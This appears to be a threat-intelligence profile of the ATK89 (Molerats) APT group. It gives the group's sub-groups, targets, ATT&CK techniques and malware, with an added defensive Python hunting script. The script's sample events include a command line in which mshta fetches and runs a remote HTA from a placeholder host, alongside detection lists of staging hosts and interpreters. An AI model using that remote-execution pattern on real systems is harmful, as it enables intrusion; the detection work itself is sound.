ATK89

Presumed Origin: State of Palestine

Alias: Extreme Jackal, Gaza Hackers Team, Gaza cybergang, Gaza cybergang Group1, Molerats, Moonlight, Operation Molerats, TA402

ATK89 (aka Molerats, Gaza Cybergang) is an Arabic-speaking, politically motivated APT group. It has been active worldwide, including in Europe and the US, but operates mainly in the Middle East and North Africa (MENA), and in Palestine in particular. The group comprises three sub-groups:

  • Gaza Cybergang Group 1 (aka MoleRATs): aims to infect the victim with a RAT and frequently stages payloads on text-sharing platforms such as PasteBin, github.com and upload.cat.

  • Gaza Cybergang Group 2 (aka Desert Falcons): relies on home-made malware, tools and techniques. Victims are typically compromised through social engineering: fake websites that promise political information, spear-phishing emails and social-messaging lures.

  • Gaza Cybergang Group 3 (aka Operation Parliament): focused on espionage against executive and judicial bodies worldwide, concentrating on MENA and Palestine in particular. Its malware executes CMD/PowerShell commands on the victim host.

The three sub-groups differ in their TTPs, but they share the same tooling once an initial foothold has been gained.

ATK89 is a persistent threat to organizations and governments in the Middle East, routinely updating both its malware implants and its delivery methods.
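Two of the tradecraft patterns described above can be hunted for in endpoint telemetry: an Office document spawning mshta.exe (the handler abused by CVE-2017-0199, listed under Vulnerabilities below) or a CMD/PowerShell interpreter, and a non-browser process fetching from the text-sharing hosts that Group 1 stages payloads on. The Python below is an added example written for this page, not tooling from the profile or from the actor; the event schema, the process lists and the sample events are constructed assumptions, and raw.githubusercontent.com is included as the raw-file host behind github.com.

```python
"""Hunting rules for two ATK89 delivery/staging patterns.

Added example for this page, not the profile's own tooling. Input is a
list of simplified Sysmon-style process-creation and network-connection
events; field names and sample records are constructed assumptions.
"""
from __future__ import annotations

from dataclasses import dataclass
from typing import Iterable

# Office applications a spearphishing attachment (T1566.001) opens in.
OFFICE_PROCS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Children that show a document has started executing code: mshta.exe is
# the HTA handler abused by CVE-2017-0199, cmd/powershell match the
# CMD/PowerShell tradecraft of Group 3, wmic.exe covers T1047.
SUSPICIOUS_CHILDREN = {"mshta.exe", "cmd.exe", "powershell.exe", "wmic.exe", "wscript.exe"}

# Text-sharing hosts named for Group 1 payload staging
# (raw.githubusercontent.com added as the raw-file host behind github.com).
STAGING_HOSTS = {"pastebin.com", "github.com", "raw.githubusercontent.com", "upload.cat"}

# Processes expected to talk to those hosts; anything else is worth a look.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    detail: str


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect(events: Iterable[dict]) -> list[Finding]:
    """Apply both rules to an event stream and return the findings in order."""
    findings: list[Finding] = []
    for ev in events:
        if ev["type"] == "process_create":
            parent, child = _basename(ev["parent_image"]), _basename(ev["image"])
            if parent in OFFICE_PROCS and child in SUSPICIOUS_CHILDREN:
                findings.append(Finding("office_spawns_interpreter", ev["pid"],
                                        f"{parent} -> {child} {ev.get('cmdline', '')}".strip()))
        elif ev["type"] == "network_connect":
            host = ev.get("dest_host", "").lower()
            image = _basename(ev["image"])
            if host in STAGING_HOSTS and image not in BROWSERS:
                findings.append(Finding("non_browser_to_text_sharing_host", ev["pid"],
                                        f"{image} -> {host}"))
    return findings


# Constructed sample telemetry, not real logs. The URL uses the reserved
# .invalid TLD as a placeholder.
SAMPLE_EVENTS = [
    {"type": "process_create", "pid": 4120,
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/update.hta"},
    {"type": "network_connect", "pid": 4120,
     "image": r"C:\Windows\System32\mshta.exe", "dest_host": "pastebin.com"},
    {"type": "network_connect", "pid": 3310,
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "dest_host": "github.com"},
    {"type": "process_create", "pid": 5002,
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c dir"},
    {"type": "network_connect", "pid": 5310,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "dest_host": "raw.githubusercontent.com"},
]


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f.rule}] pid={f.pid} {f.detail}")
```

On the sample stream this flags the Word-to-mshta spawn, mshta's fetch from pastebin.com and PowerShell's fetch from raw.githubusercontent.com, while Chrome browsing github.com and Explorer launching cmd.exe pass. In a real estate github.com is noisy enough that the second rule should be narrowed further (by destination path, or by allow-listing developer tooling) before it is paged on.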

 


    Target sector

    • Aerospace
    • Defense
    • Energy
    • Financial Services
    • Government and administration agencies
    • High-Tech
    • Media

    Target countries

    • Afghanistan
    • Algeria
    • Canada
    • Chile
    • China
    • Denmark
    • Djibouti
    • Egypt
    • Germany
    • New Zealand
    • Morocco
    • Russian Federation
    • Qatar
    • North Macedonia
    • Palestine
    • Oman
    • Israel
    • Jordan
    • Korea, Republic of
    • Iraq
    • Iran, Islamic Republic Of
    • India
    • Kuwait
    • Libya
    • Lebanon
    • Latvia
    • Saudi Arabia
    • Serbia
    • Slovenia
    • Somalia
    • Syrian Arab Republic
    • Turkey
    • United Arab Emirates
    • United Kingdom Of Great Britain And Northern Ireland
    • United States Of America
    • Yemen

    Attack pattern

    • T1003 - OS Credential Dumping
    • T1008 - Fallback Channels
    • T1047 - Windows Management Instrumentation
    • T1057 - Process Discovery
    • T1091 - Replication Through Removable Media
    • T1116 - Code Signing (deprecated ID; now T1553.002 - Subvert Trust Controls: Code Signing)
    • T1491 - Defacement
    • T1566.001 - Spearphishing Attachment
    • T1566.002 - Spearphishing Link

    Motivation

    • Ideology

    Malware

    • DHS2015 / iRat
    • DHS Spyware
    • DropBook
    • DustySky
    • Falcons’ Backdoor
    • Falcons’ Downloader
    • LastConn
    • MoleNet
    • Molerat Loader
    • Pierogi
    • PoisonIvy
    • Scote
    • SharpStage
    • Spark
    • TajMahal APT Framework
    • XtremeRAT

    Vulnerabilities

    • CVE-2017-0199 - Microsoft Office/WordPad remote code execution (OLE2link object in a crafted document that causes mshta.exe to run a remote HTA)